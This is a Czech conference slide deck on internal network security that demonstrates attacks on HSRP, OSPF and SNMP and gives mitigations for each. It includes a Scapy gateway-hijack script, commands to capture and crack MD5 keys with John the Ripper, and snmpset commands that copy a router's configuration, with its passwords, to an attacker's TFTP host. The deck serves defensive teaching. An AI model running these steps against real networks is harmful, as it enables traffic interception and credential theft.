Zabezpečení síťových protokolů
Michal Kostěnec CESNET, z. s. p. o. 9. 5. 2015
1
Obsah ●
Úvod – –
●
Zabezpečení protokolů uvnitř sítě – – – –
●
Význam bezpečnosti uvnitř sítě Vnitřní vs vnější
Krátce teorie o funkci protokolu Dostupné druhy zabezpečení Popis útoku HSRP, OSPF a SNMP
Zajímavost z praxe v 2014
9. 5. 2015
2
Bezpečnost uvnitř sítě ●
Složitější ochrana než před útoky z Internetu –
Povaha útoků se může lišit ●
–
Různé kategorie sítě ●
●
–
Klientské (portsecurity, DHCP snooping, DAI, IPSG, storm-control) Serverové (FW, FHRP, mgmt rozhraní)
Neočekávané (nepříjemné) vlastnosti ● ●
9. 5. 2015
Přibývá L2 komunikace
OS Síťových prvků
3
HSRP ●
Rodina protokolů FHRP –
HSRP (Cisco proprietární), VRRP, GLBP
●
Poskytují redundanci pro next-hop (def. gw)
●
Aktivní sledování stavu HSRP routeru
●
●
–
Pravidelné HELLO zprávy
–
Hello – 3s
–
Hold-time – 10s
V případě výpadku další router s nejvyšší prioritou převezme roli gw Virtuální IP a MAC
9. 5. 2015
4
HSRP fáze
9. 5. 2015
5
Použití HSRP ●
●
Nejčastěji v serverové podsíti –
Zajištění max redundance GW
–
Bezvýpadková změna aktivního směrovače
–
Podpora 2+ participujících směrovačů
–
Možnost „load-balancingu“
Méně časté v klientské síti –
●
Sítě s vysokou prioritou
Spojení 2 active/active párů
9. 5. 2015
–
FW + směrovač
6
Naše síť s HSRP
9. 5. 2015
7
HSRP & Cisco
9. 5. 2015
8
HSRP zprávy
9. 5. 2015
9
Druhy autentizace HSRP ●
●
●
Bez autentizace –
Výchozí stav
–
Autentizační řetězec – cisco (viz hello paket)
Plaintext autentizace –
Vlastně žádná změna
–
Není autentizace, pouze jako ochrana při chybné konfiguraci
MD5 autentizace
9. 5. 2015
–
Vytváří se HMAC zprávy
–
Integrita obsahu a autenticita odesílatele 10
Útok na HSRP
9. 5. 2015
11
Útok na HSRP ●
Vysíláme pravidelně pakety s parametry pro získání pozice aktivního směrovače –
Cíl je vyhrazená multicastová skupina
–
Priorita 0-255, čili 255;-)
–
Potenciálně vyšší IP než jsou „pravé“ směrovače
●
MITM nebo DoS
●
Jaký je rozdíl mezi (na co si dávat pozor)
9. 5. 2015
–
Fyzicky v lokální síti
–
Vzdáleně na kompromitovaném stroji 12
Útok prakticky ●
Scapy –
Generování, dekódování a manipulace s pakety
ip = IP(src='10.10.10.101', dst='224.0.0.2') udp = UDP() hsrp = HSRP(group=10, priority=255, virtualIP='10.10.10.1', auth='Vlan10!') send(ip/udp/hsrp, iface='eth0', inter=3, loop=1) >>> ip/udp/hsrp
>> 9. 5. 2015
priority=255 group=10 auth='Vlan10!' virtualIP=10.10.10.1 13
Co budeme dělat s MD5? ●
●
Útok identický, jen potřebujeme „klíč“ –
Online Bruteforce
–
Offline bruteforce
Nahrání komunikace na lokální síti
tcpdump -i eth0 -n dst host 224.0.0.2 -s0 -w /tmp/hsrp.pcap ●
Vyparsování dat pro offline bruteforcing (MagnumRipper) pcap2john.py hsrp.pcap > hsrp.john
●
Bruteforcing (JtR) john hsrp.john
9. 5. 2015
14
HSRP summary ●
Používat MD5 autentizaci
●
Používat dostatečne silný(dlouhý) klíč
●
Případně použít ACL –
Pouze vyjmenované HSRP směrovače
ip access-list extended ACL_HSRP_ROUTER permit udp host 10.10.10.3 eq 1985 any eq 1985 deny udp any eq 1985 any eq 1985 log permit ip any any
9. 5. 2015
15
OSPFv2 (dále OSPF) ●
Open Shortest Path First
●
Nejpoužívanější dynamický směrovací protokol –
Hierarchické dělení sítě ●
●
9. 5. 2015
Oblasti (informace se vyměňují uvnitř oblasti, tzv. area) Hraniční směrovače pro výměnu zpráv mezi oblastmi
–
Hello zprávy v krátkém intervalu (rychlá konvergence)
–
Dijkstrův algoritmus (rychlost linky)
–
Loadbalancing (cesty se stejnou „cenou“)
–
Autentizace 16
Druhy autentizace ●
●
Shodné jako u HSRP –
Jen se nedělá HMAC, ale pouze MD5 klíče
–
Draft na SHA256 HMAC
Bez autentizace –
●
●
Výchozí stav
Plaintext autentizace –
Vlastně žádná změna
–
Není autentizace, pouze jako ochrana při chybné konfiguraci
MD5 autentizace
9. 5. 2015
17
(NE)Použití OSPF ●
●
Pro páteřní sítě s rychlou konvergencí –
Řádově jednotky sekund dle nastavení
–
Robustní díky hierarchii
–
Náročnější na CPU
Klientské sítě –
●
Není důvod, spíše chyba v konfiguraci
Serverové sítě
9. 5. 2015
–
Virtuální směrovače (CSR 1000V)
–
Anycast DNS, ... 18
Naše síť s OSPF
9. 5. 2015
19
OSPF podmínky sousedství ●
●
Musí se shodovat –
Síť a maska na lince
–
Oblast (Area) + její typ
–
Hello + Dead časy
–
MTU (kontrolu lze vypnout)
–
Autentizace
Nesmí se shodovat –
9. 5. 2015
Router-id (označení směrovače)
20
Route injection ●
Navázání sousedsví –
Problém při autentizaci
●
MITM nebo DoS
●
Injektování routy –
Lokální síť (příliš složité) ●
–
Vzdálená síť/IP ●
●
Quagga
9. 5. 2015
PROČ? Např. 8.8.8.8 Int Lo1 Ip address 8.8.8.8 255.255.255.255 Router ospf 1 Network 8.8.8.8 0.0.0.0 area 0
21
Kde zjistíme potřebné parametry
9. 5. 2015
22
Ilustrace útoku na OSPF
9. 5. 2015
23
Útok na OSPF prakticky ●
Uvažujme kompromitaci serveru –
Do sítě jsou posílány HELLO zprávy pro DNS Anycast server
–
Zjistíme potřebné parametry pro sousedství ●
–
Navážeme sousedství
–
Injektujeme routu ● ●
●
Wireshark, tcpdump, tshark, …
0.0.0.0/0 je riskantní Nejlépe /32
Při použité autentizaci –
9. 5. 2015
Získání dat a bruteforce 24
OSPF hello s autentizací
9. 5. 2015
25
OSPF s MD5 autentizací ●
Postup téměř identický jako u HSRP
●
Nahrání komunikace na lokální síti
tcpdump -i eth0 -n dst host 224.0.0.5 -s0 -w /tmp/ospf.pcap ●
Vyparsování dat pro offline bruteforcing (ettercap > v0.8.1) ettercap -Tqr ospf.pcap > ospf.john
●
Bruteforcing (JtR) john ospf.john
9. 5. 2015
26
OSPF summary ●
Používat MD5 autentizaci
●
Používat dostatečne silný(dlouhý) klíč
●
Passive-interface default –
No passive-interface Vlan10
●
Sousedé explicitně přes unicast
●
Filtrování přijímaných prefixů
ip prefix-list DNS_ANYCAST_IN seq 5 permit 10.3.3.3/32 router ospf 1 distribute-list prefix DNS_ANYCAST_IN in Vlan10 9. 5. 2015
27
SNMP ●
Simple Network Management Protocol
●
Základní protokol pro dohled/správu sítě
●
Základní pojmy –
Manager (Server) ●
–
Agent (SW na zařízení) ● ●
–
GET/SET požadavky (RO vs RW community) GET/SET odpovědi TRAPy (nevyžádané SNMP zprávy)
„Community“ ●
Lze chápat jako heslo (pouze v1 - v2c)
Hierarchický jménný systém OID
● 9. 5. 2015
–
Pro snadnější práci MIB tabulky
28
MIB tabulka
9. 5. 2015
29
SNMP II. ●
●
●
Verze 1 –
původní verze
–
Nepodporuje 64bit čítače
Verze 2c –
Nové metody pro čtení dat
–
Autentizace jen dle „community“
–
Nejpoužívanější v součastnosti
Verze 3 –
9. 5. 2015
Autentizace a šifrování 30
Cisco konfigurace SNMP snmp-server community $emestralk4. RO snmp-server community read.write!C0mmunity RW snmp-server trap-source Loopback0 snmp-server location NTK, Velky sal - XX,XX420 snmp-server contact Michal Kostenec, [email protected], +420 111 222 333 snmp-server host 10.50.10.3 webtrap snmp-server enable traps cpu threshold
9. 5. 2015
31
Průzkum prostředí při RO ●
Hledání zranitelností –
Neoprávněný přístup
–
Eskalace práv
–
DoS
iso.3.6.1.2.1.1.1.0 = STRING: "Cisco IOS Software, C3900 Software (C3900-UNIVERSALK9-M), 15.2(4)M5, RELEASE SOFTWARE (fc2)“
CVE-2014-3359 An attacker could exploit this vulnerability by sending malformed DHCPv6 packets to be processed by an affected device. An exploit could allow the attacker to cause a memory leak and eventual reload of an affected device. 9. 5. 2015
32
Průzkum prostředí při RO ●
Zjišťování topologie sítě –
Popis portů
–
Vlany
–
Připojená zařízení
iso.3.6.1.2.1.31.1.1.1.18.10008 = STRING: "SWT Testovaci podsit“ iso.3.6.1.2.1.31.1.1.1.1.10008 = STRING: "Fa0/8" iso.3.6.1.4.1.9.9.68.1.2.2.1.2.10008 = INTEGER: 10 iso.3.6.1.2.1.17.1.4.1.2.9 = INTEGER: 10008 iso.1.3.6.1.2.1.17.4.3.1.2.0.0.12.7.172.8 = 9 iso.3.6.1.2.1.17.4.3.1.1.0.0.12.7.172.8 = Hex-STRING: 00 00 0C 07 AC 08 iso.3.6.1.2.1.4.22.1.2.430.10.10.101.10 = Hex-STRING: 00 00 0C 07 AC 08
9. 5. 2015
33
Zajímavosti při RW community ●
Možnost nastavení položky s možností zápisu
●
Stažení konfigurace :-) –
Hesla, sdílená tajemství, další zajímavá konfigurace
snmpset -c community -v 2c 10.10.10.2 1.3.6.1.4.1.9.9.96.1.1.1.1.2.336 i 1 (tftp) snmpset -c community -v 2c 10.10.10.2 1.3.6.1.4.1.9.9.96.1.1.1.1.3.336 i 4 (runningConfig) snmpset -c community -v 2c 10.10.10.2 1.3.6.1.4.1.9.9.96.1.1.1.1.4.336 i 1 (networkFile) snmpset -c community -v 2c 10.10.10.2 1.3.6.1.4.1.9.9.96.1.1.1.1.5.336 a 10.10.10.101 (dstIP) snmpset -c community -v 2c 10.10.10.2 1.3.6.1.4.1.9.9.96.1.1.1.1.6.336 s R1-config.conf (filename) snmpset -c community -v 2c 10.10.10.2 1.3.6.1.4.1.9.9.96.1.1.1.1.14.336 i 1 (active) 9. 5. 2015
34
Stažená konfigurace enable secret 4 xPC5koYEZRbDek6EF24RmwY.I8z87NNt7erVl7DxBH. username admin privilege 15 secret 5 $1$lVFH$x7vloxy4oaT9jvrNt0jGn/ aaa group server tacacs+ tac_admin server 10.100.1.20 server 10.200.1.20 tacacs-server key 7 25010A3C560F3C067C1C16174115 archive path tftp://10.100.1.13/backup/sw101-config line con 0 password 7 06025C2B41171D49 line vty 0 4 access-class management-access-v4 in password 0 SuperTajneHeslo.908 ip access-list standard management-access-v4 permit 10.99.1.0 0.0.0.255 9. 5.permit 2015 10.100.1.0 0.0.0.255
35
Summary SNMP ●
Nejvhodnější je v3 (autentizace, šifrování) –
Používá se spíše v2
●
„Community“, které nelze uhádnout hrubou silou
●
Nepoužívat RW „community“, pokud není nutné
●
Omezit přístup na vyjmenované IP rozsahy
ip access-list standard management-access-v4 permit 10.99.1.0 0.0.0.255 deny any log snmp-server community $emestralk4. RO management-access-v4
9. 5. 2015
36
Praxe 2014: Duplicitní IP ●
Tiskárna a posléze WIN hlásí duplicitní IP
●
Řízený přístup k síti
●
–
Pouze registrovaná zařízení (DHCP)
–
DHCP snooping, DAI, IPSG
Problém na různých VLANách
9. 5. 2015
37
Praxe 2014: Duplicitní IP ●
●
Nová úžasná funkce –
IP Device Tracking (IPDT)
–
The main IPDT task is to keep track of connected hosts (association of MAC and IP address). In order to do this, it sends unicast Address Resolution Protocol (ARP) probes with a default interval of 30 seconds
Použití
9. 5. 2015
–
Web-based authentication
–
Auth-proxy
–
Flexible netflow
–
Cisco TrustSec (CTS)
–
...
38
Praxe 2014: Duplicitní IP show ip device tracking all IP Device Tracking = Enabled IP Device Tracking Probe Count = 3 IP Device Tracking Probe Interval = 30 IP Device Tracking Probe Delay Interval = 0 -----------------------------------------------------------IP Address MAC Address Vlan Interface STATE -----------------------------------------------------------10.10.0.20 a820.661b.b384 10 GigabitEthernet0/1 INACTIVE
9. 5. 2015
39
Dotazy
?
? ? 9. 5. 2015
40